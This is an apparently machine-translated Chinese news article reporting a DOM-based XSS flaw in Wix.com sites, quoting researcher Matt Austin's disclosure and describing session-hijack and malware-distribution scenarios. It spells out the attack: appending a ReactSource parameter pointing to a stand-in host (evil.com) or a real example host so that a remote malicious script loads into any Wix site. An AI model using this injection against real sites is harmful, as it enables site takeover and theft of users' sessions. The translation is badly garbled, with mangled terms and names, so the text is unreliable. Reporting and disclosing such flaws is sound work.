关键dom xss缺陷wix.com上耗资百万网站

基于云的开发平台Wix.com的基于DOM的跨站点脚本漏洞耗资百万网站。

基于云的开发平台wix.com受到基于DOM的跨站点脚本漏洞的影响,可以由攻击者利用,以完全控制流行平台上运行的任何网站。在Wix.com上托管的数百万个网站可能存在风险。

当我写作的时候,缺陷仍然存在于Matt Austin(@mattaustin.),具有对比度安全的高级安全研究工程师,谁发现了这个问题。

“DOM Based XS. (或者在某些文本中调用时,“0 XSS”)是XSS攻击,其中由于修改原始客户端脚本所使用的受害者浏览器中的DOM“环境”而执行攻击有效载荷,因此客户端代码以“意外”方式运行。也就是说,页面本身(HTTP响应)不会改变,但由于DOM环境中发生的恶意修改,页面中包含的客户端侧代码不同。”阅读描述 发表 by the OWASP.

基于DOM的XS与XSS攻击有很大差异  其中由于服务器端漏洞,在响应页面中提供恶意有效载荷。

低于奥斯汀的摘录’s 博客帖子.

“Wix.com具有严重的DOM XSS漏洞,允许攻击者完全控制Wix托管的任何网站。只需将单个参数添加到Wix上创建的任何站点,攻击者可能会导致其javascript作为目标网站的一部分来加载和运行。

TL; DR:

  • 添加:?ReactSource =http://evil.com 到Wix.com上创建的任何网站的任何URL。
  • 确保even.com在/packages-bin/wixcodeinit/wixcodeinit.min.js上托管恶意文件

这是一个发生的示例漏洞,导致反射有效载荷发生:

Wix.
他在10月初以来,奥斯汀尝试了几次向Wix.com报告漏洞。

Wix.com声明有8600万用户目前正在采用其平台。

奥斯汀详细说明了两个不同的攻击场景,在一个案例中,WIX网站所有者被攻击者诱导访问加载的恶意网址,该网址加载的特制JavaScript,可以劫持目标的浏览器会话。攻击者可以获得受害者’S浏览器会话并以完全控制本网站的行为。

“Wix.com网站的管理员控件可用于广泛分发恶意软件,创建动态,分布式,浏览器的僵尸网络,矿地密码和否则通常控制网站的内容以及使用它的用户。” wrote Austin.

在第二次攻击方案中,用户使用特制的URL诱合WIX网站,该网站通过基于DOM的XSS攻击将JavaScript加载到目标Wix.com站点中。可以由攻击者修改基于Wix.com的网站,以便特定的浏览器会话提供恶意代码。

In both scenarios, attackers need to host malicious JavaScript on a server and point to it within a URL. (i.e. “http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com”).

皮奈里格帕加尼尼

[Adrotate Banner =”22″]

全球infosec奖项2021

我们在第9年,这些奖项非常受欢迎 - 帮助建立嗡嗡声,客户意识,销售和营销增长机会,投资机会等等。

现在申请